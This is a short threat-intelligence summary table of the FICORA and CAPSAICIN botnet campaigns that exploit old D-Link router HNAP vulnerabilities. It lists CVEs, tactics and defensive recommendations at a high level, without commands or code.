Category | Details |
---|---|
Threat Actors | Botnet operators using Mirai variant (FICORA) and Kaiten variant (CAPSAICIN). |
Campaign Overview | Surge in botnet attacks leveraging D-Link router vulnerabilities; FICORA targeting globally, CAPSAICIN focusing on East Asia (Japan, Taiwan). CAPSAICIN particularly active on Oct 21–22, 2024. |
Target Regions | FICORA: Global; CAPSAICIN: East Asia (Japan, Taiwan). |
Methodology | Exploits vulnerabilities in D-Link routers (via HNAP interface), brute-force credential attacks, downloader scripts, and C2 communication for executing commands. |
Products Targeted | D-Link routers, Linux-based systems. |
Malware Reference | FICORA (Mirai variant) and CAPSAICIN (Kaiten variant). |
Tools Used | Commands like wget, ftpget, curl, tftp for downloading payloads; brute-force attack functions; malicious scripts (“multi” and “bins.sh”). |
Vulnerabilities Exploited | HNAP weaknesses in D-Link routers (CVE-2015-2051, CVE-2019-10891, CVE-2022-37056, CVE-2024-33112). |
TTPs | Exploiting unpatched vulnerabilities, brute-force login attempts, killing rival botnet processes, leveraging DDoS techniques (UDP, TCP, DNS), maintaining persistence, and interaction via C2 servers. |
Attribution | Botnet campaigns targeting vulnerable D-Link routers and leveraging decade-old vulnerabilities. |
Recommendations | Regularly update router firmware and kernels, patch known vulnerabilities, use comprehensive monitoring, and implement strict access controls. |
Source | The Hackers News |
Read full article: https://thehackernews.com/2024/12/ficora-and-kaiten-botnets-exploit-old-d.html
The above summary has been generated by an AI language model
Leave a Reply